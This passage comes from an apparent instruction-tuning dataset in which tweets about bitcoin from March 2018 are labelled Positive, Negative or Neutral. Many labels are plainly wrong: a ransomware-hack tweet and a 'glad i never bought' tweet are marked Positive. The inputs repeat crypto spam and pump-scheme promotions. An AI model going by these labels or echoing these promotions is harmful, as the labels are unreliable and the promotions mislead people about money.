bot to make daily scalping trades", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lister_lester He wants to buy the bitcoin dip. 
: )", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Alfredo_THC make bitcoin and the dow go back up", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The short way was to help, Google and Facebook went for the money. Plan B, just go through you\ud83d\udd25\n\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNBC Would be nice to see an after Pic when bitcoin crashes", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:32:12 2018 (15:49)\nUSD : 8416.59\nWght: 0.42\nBlk#: 514758\nSize: 736.0 KB\nTXs: 1658\nPool: 75 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000004d1d76f3a8931d87ad736d36fd62c733e05cf56d9274e mined at height 514758.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So @Ania_Nimbla you like #Bitcoin & #Crypto Cool \ud83d\udc4d\ud83c\udffb Great to connect Ania much appreciated", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@afaqshah @PhilakoneCrypto Wishing ill upon bitcoin, rude", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin buy now 8387 good price for enter", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@EstherKuKu Then redeem your points for Bitcoin and boom goes the dynamite!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNBC How much are they worth in bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Ginkgo_tree_Kr @rogerkver @Falkvinge Bitcoin is not a philosophy. BCH is not Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I really look forward to bitcoin being large enough that these whales can't fuck with the price so much.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 4k by July \ud83e\udd11\ud83e\udd11\ud83e\udd11\ud83e\udd11", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Lil Bitcoin #newgenerationrapnames", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$ELEC Pump detected, in 5 days we will see + 500% on this baby! Very hot inside news are coming! #bitcoin #altcoin #eth $eth $xmr $btc", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lopp @coindesk Better bitcoin resource:", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bitstein By this logic what is work?? Trading??? 
Every diehard hodler I know works to better bitcoin for free.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Since /r/buttcoin is actually one of the oldest bitcoin subs around we were in the top 3 I think for a few years", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC,ETH,ETC,LTC,BCH,MONA\nPlease send someone virtual currency\u3000\n#Bitcoin #VirtualCurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bitcoinyuri @badger_coin Looks nice...makes me wanna buy some $BTC #Bitcoin !", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNBC (2932331 follows)\nThis couple loves bitcoin so much that they decided to have a bitcoin themed wedding. Most of their guests gave...", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lopp Better bitcoin resource:", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8441.65 / 6851.665\u20ac\n1 bitcoin-cash = $970.165 / 787.434\u20ac\n1 ethereum = $515.2 / 418.162\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"We have elected to put our money and faith in a mathematical framework that is free of politics and human error.\" Tyler Winklevoss #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SommerRay do you like bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's hard to make a good TA in ALTS if the market is being moved by $btc. So, let's keep following The King. 
$btcusd $crypto #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nachdermas buy bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": ":( :( ....[Bitcoin performance assessment (-0.18%)] #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NoahRobertson01 glad i never bought into the bitcoin hype", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Ever wanted to experiment with bitcoin? Send some to this address, yo:1BFaVmv91jmxSZDkiNedw1kt56m4X5bpRm", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin is all of the beautiful poetry you read but failed to understand.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@thealexwolfe @LockedOnKnicks You'd better run that ish like a bitcoin mining facility. It's like 0.00000:p000o.O0013 cents per stream... \ud83d\ude2d", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\ud83d\udcaf\ud83d\udcaf\ud83d\udcaf great dealEarn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@C1TY_0F_FL1NT @chadxenu @BigTiddiePolice You'll have to pay me 1 bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin next 1 hour high low range potential \n\nLow 8343 \nHigh 8623", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@crypt0snews Bitcoin can be wiped out if the authorities prove it as a counterfeit like a 3 dollar fake bill....", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I really just sent 300 to the wrong bitcoin address.. wow.. fml", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DJSweetBrush @ericgeller Unless it's money laundering through Bitcoin. Could be anything, though lots of big names involved.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "DO-NOT short Bitcoin, you will get crushed\n\nSub 0.050 Eth/Btc is possible", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "IMHO bitcoin is the worst!! \ud83c\udf19", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin disini", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Moneto is a loan service, through which users can get real money on the security of Bitcoin and almost instantly.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MichaelMyers @Bitcoin @blockchain This feels like a reach.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. 
Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#MONETO will provide an opportunity to take a loan on the security of Bitcoin immediately, comfortably and reliably as possible.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Might be risky. But it is time to go long on #xbtusd. Go #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Including bitcoin/altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Old man yells at Bitcoin\" is exactly the same pattern as:\n\n\"The Church yells at Darwin for claiming that man was not created by god\"", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Snowden Post more bitcoin FUD please.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What does \"altcoin\" mean? $crypto #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "old: \"man, i wish i had bought bitcoin back then!\"\nnew: \"man, i wish i had sold bitcoin back then!\"", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BradyDale @coindesk @Snowden @blockstack @WolfieZhao I also think this as one of the biggest endorsements for Bitcoin indirectly", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Moneto will provide an opportunity to take a loan on the security of Bitcoin as quickly, conveniently and safely as possible.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. 
Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 0 satoshi per byte. \nBTC : $8406 / \u20ac6816 / \u00a35956 @ Block 514758. \nMarket Cap: 145.52B USD. #Bitcoin #Market", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@QuestForTori A Smart app that lets you mine for bitcoin while you order dominos", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Sicarious_ A trading tool for more Bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "A poet without love were a physical and metaphysical impossibility. #JohnKeats #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8458.96 / 6865.714\u20ac\n1 bitcoin-cash = $973.827 / 790.406\u20ac\n1 ethereum = $517.184 / 419.773\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ninthcompanion This is literally my thoughts exactly\n\nbut nah its a way to mine bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#MONETO is a loan service, allowing users will be able to receive real money on the security of Bitcoin and almost immediately.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CandyHeartsBand fun fact: u can sell them on the black market in exchange for bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@joenatividad Uh oh. Hope you don\u2019t have to buy a new one. 
Damn bitcoin miners ruin everything", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What % of the time does fundamental \"FUD\" show up to justify a technical dump? #Bitcoin #Ethereum #cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DonCryptoLife @CatoshiK @rogerkver Roger Ver was not associated with the creation of Bitcoin Cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8420.77", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PhilakoneCrypto You're not trading it for Bitcoin now? \ud83e\udd11", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Join the #FlightToSafety #NoTariffs\n\n#bitcoin #litecoin #bitcoincash #investing #fintech #stockmarkets", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MaddowBlog @MSNBC right no the city of atlanta computer system has been Hacked and their asking for 51000 in bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "crazy thought: that guy who bought bitcoin at $0.08 and sold it at $0.30 made more money than anyone who bought in December", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@witsureisquick No bitcoin in existence can amount to the worth my followers are.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@shillycrypto Present: \"I wish I had sold Bitcoin right now!\"", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@LeNuitRenard @LordRapt0rJesus @Dunnestar @ProfFaustus Do you hodl bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MarkYusko Good, bad, indifferent, you\u2019re the only serious investor I know as bullish on bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Dutch Court Finds Bitcoin A Legitimate \u201cTransferable Value\u201d: A Dutch court ruled BTC a \u201ctransferable value\u201d, which\u2026", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:53:03 2018 (20:51)\nUSD : 8393.36\nWght: 0.42\nBlk#: 514759\nSize: 1062.6 KB\nTXs: 2146\nPool: 96 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NotJustin11 Honestly have no clue how to get bitcoin \ud83d\ude02", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "look on youtube for the purchase of crypto#FLOGmall#blockchain#bitcoin#btc#etherum#ico", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:54:12 2018 (1:09)\nUSD : 8393.36\nWght: 0.42\nBlk#: 514760\nSize: 64.4 KB\nTXs: 129\nPool: 39 (0.0 MB)\n@dellisny\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sashandiggers @aantonop @farantzos LN is presumably a 100% trusted intermediary between Me and the Bitcoin Ledger", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CRInvestor @ErikSTownsend You know what he thinks about bitcoin right?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000110c6088b447cd0e9eca66d321b19218027aa5a2fba391 mined at height 514759.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000021c74f60ebbe8111e38b6a6d14b91d918ec68a9cab17f1 mined at height 514760.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000414d2134cf429c8a8ee667dbe1ff76a32ea809068114aa mined at height 514761.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:54:29 2018 (0:17)\nUSD : 8394.66\nWght: 0.42\nBlk#: 514761\nSize: 9.9 KB\nTXs: 26\nPool: 75 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WeTrustPlatform @el33th4xor Thanks! We are indeed the first #bitcoin nonprofit, est. 
2013 \ud83d\ude4c\ud83c\udffe", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "4661dbbb251658a2a2e9422ddd5eb7a1e189fb2532812454edb443b07e55beb9/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Ilovebitcoin because there are no legal issues with using #bitcoin everywhere", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@emcgillivray @ncweaver @random_walker Bitcoin is not equal to blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Kevin_Pham Although were #AdamSmith around today he might call it an #InvisibleVirtualHand.\n\n#cryptocurrency #blockchain #bitcoin $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "semangat mengumpulkan bitcoin, Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I feel like most of the stock drops are because of amerixan owned bitcoin owners though", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8419.00 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I think because of the law in america....it is definetly hurting american bitcoin owners compared to in eu vs korea", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30399.00000000 | BITCOIN(BLCHAIN) R$27878.6590054 | LITECOIN(MCDTBC) R$576.80000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "We need a bounce here or these next few weeks are gonna be ugly... $BTCUSD #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Which will launch first? $crypto #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bad news: Bitcoin on the decline.\nCurrent Rate: 8413.21 USD = 1 BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,444.11, market cap of $142,996,569,692 (44.33%), and 24 hr vol. 
of $5,470,960,000 (37.57%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 09:00PM #Bitcoin Price:\nUSD 8671.55 | EUR 7036.48 | JPY 924287.55", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,442.21\nChange in 1h: -0.08%\nMarket cap: $142,964,183,134.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-NXT AskRate: 0.00001621 #Bittrex #NXT $NXT #NXT #altcoin #crypto #bitcoin\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#USD #bitcoin Index:\n 11894 satoshi\u2019s = $1\n #silver: 0.002 btc/oz", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.33% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,413.21, EUR 6,824.42", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8442.21\nEthereum:$516.396\nBitcoin Cash:$971.068\nLitecoin:$159.128\nRipple:$0.634595\nIOTA:$1.27617", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8444.11 / 6853.661\u20ac\n1 bitcoin-cash = $971.068 / 788.167\u20ac\n1 ethereum = $516.395 / 419.132\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2018-03-23 04:00 UTC Bitcoin Price: 8407.91 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Google will Create its Own Blockchain in the Future: Report #crypto #bitcoin #trading", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8407.31/$8418.06 #Bitstamp\n$8407.77/$8413.40 
#Kraken\n\u21e2$-10.29/$6.09\n$8360.00/$8444.03 #Coinbase\n\u21e2$-58.06/$36.72", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$27.5M; Support til $8200:$36.7M $BTC $BTCUSD #bitcoin #orderbook #markets #trading", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003316 (+0.00000015) #BTC / 0.278311 (+0.00234) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8418.78 | -0.0029%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.048257 (+0.00011980) #BTC / 404.992 (+2.56100) #USD. Market rank is 11. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004594 (-0.00000023) #BTC / 0.385555 (-0.00044) #USD. Market rank is 117. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078344 (+0.00000327) #BTC / 6.57491 (+0.05265) #USD. Market rank is 6. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002250 (-0.00000008) #BTC / 0.18882 (+0.00003) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@harto So Russian hackers can use it's processor to mine bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "sse in medium for doubling for deposit#FLOGmall#blockchaun#bitcoin#btc#etherum#ico", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,411.65 v #BitcoinCash $966.57 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 13:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82 $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PapixSatoshi @nanocurrency If Bitcoin we're to crash and burn right now, every crypto would become worthless. Be careful what you wish for", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin price (USD): $8,413.21. Changed -299.68 USD since yesterday. Data last updated 15 minutes ago. #bitcoin #bitcoinprice", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Binance Lists WanCoin ( $WAN ) #bitcoin #Bittrex #ethereum", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8418.82 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoGat When Bitcoin on Binance? 
It use a pumpy to prevent the dumpy you know \ud83d\ude1d", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin percentage of market cap: 44.33 %\n#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8418.82 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoGat When Bitcoin on Binance? It could use a pumpy to prevent the dumpy you know \ud83d\ude1d", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of a #bitcoin is $8418.82. Have a nice day!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8418.82 via Chain #BTCUSD #cryptocurrencies #blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RT_com Hey dope, it\u2019s Costco.\n\nIt\u2019s Bitcoin.\n\nIt\u2019s Instant Pot.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8418.82", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin $BTC | $8,420 (-6.82%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82 - please RT #BTCUSD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@taidi_ji How could Bitcoin absorb the value of a split 
window Corvette?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8444.11 Down -$0.76 -0.01% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sometimes you have to fight your friends harder than you do your enemies\ud83d\udd25\n\n#bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin and all is cool but have you invested in a person that turned out totally worthless.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Let's go for the last week see in medium#FLOGmall#blockchain#bitcoin#btc", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@donlydacius @trumpthat_pussy @vj239 How do you feel about bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@krassenstein Bitcoin???????", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@smsportsguy @JoeFloccari @KariVanHorn Bitcoin is worth 10x what it was just a few years ago. I wouldn't call that tanking.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SilviuMajor everyone follow @MyBit_DApp. 
The next bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@drumchode @hashflare and if u bought 10k worth of bitcoin in december ud lose money too", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JosinaAnderson everyone follow @MyBit_DApp. The next bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@isiahxmartin everyone follow @MyBit_DApp. The next bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$SANUSD exiting oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Stop_Trump20 everyone follow @MyBit_DApp. 
The next bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Eu is probably the safest place for bitcoin farmers/owners due to the protection they have from the laws in eu", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8443.41 / 6853.093\u20ac\n1 bitcoin-cash = $973.852 / 790.426\u20ac\n1 ethereum = $518.39 / 420.751\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Provides Freedom, Says New PBoC Chief as China Opens Doors to $27 Trillion Payments Market #blockchain #hodl #trading", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.444,110\n1 Hour: -0.05 % | 24 Hours: -6.82 % | 7 Days: 2.70 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily 